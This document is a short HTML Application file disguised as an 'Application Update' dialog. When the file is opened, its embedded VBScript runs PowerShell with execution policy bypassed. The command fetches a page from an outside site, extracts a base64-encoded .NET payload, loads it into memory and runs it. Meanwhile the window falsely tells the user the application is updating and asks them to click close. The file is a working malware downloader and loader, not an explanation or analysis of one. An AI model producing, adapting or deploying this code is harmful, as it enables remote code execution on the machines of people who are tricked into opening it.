<HTA:APPLICATION
    APPLICATIONNAME = "Application Update"
    ICON = "599CD.ico"
    ID = "Application Update"
    BORDER = "static"
    CAPTION = "yes"
    SHOWINTASKBAR = "no"
    SINGLEINSTANCE = "yes"
    SYSMENU = "yes"
    WINDOWSTATE=""
    SCROLL = "no"
    SCROLLFLAT = "no"
    VERSION = "1.0"
    INNERBORDER = "yes"
    SELECTION = "yes"
    MAXIMIZEBUTTON = "yes"
    MINIMIZEBUTTON = "yes"
    NAVIGABLE = "yes"
    CONTEXTMENU = "yes"
    BORDERSTYLE = "normal"
/>
<HTML>
<HEAD>
<script language="VBScript">
Set TOTESobj = CreateObject("Wscript.Shell")
TOTESobj.Run "powershell -noexit -nop -exec bypass invoke-command -ScriptBLock {$R = (Invoke-WebRequest -Uri 'http://www.kerneldontcare.com/WorldWillBURN/').Content; $PAY = [regex]::Match($R,'DontReadTHIS.*\n.*').value; $Program_bytes = [System.Convert]::FromBase64String(($PAY.toString() -replace 'DontReadTHIS', '')); [Reflection.Assembly]::Load($Program_bytes) > $Null; [DontLookHere]::Legit()}"
</script>
</HEAD>
<BODY>
<b>Application Update</b>
<p>Application is updating in the background please click close</p>
<button onclick="self.close()">Close</button>
</BODY>
</HTML>
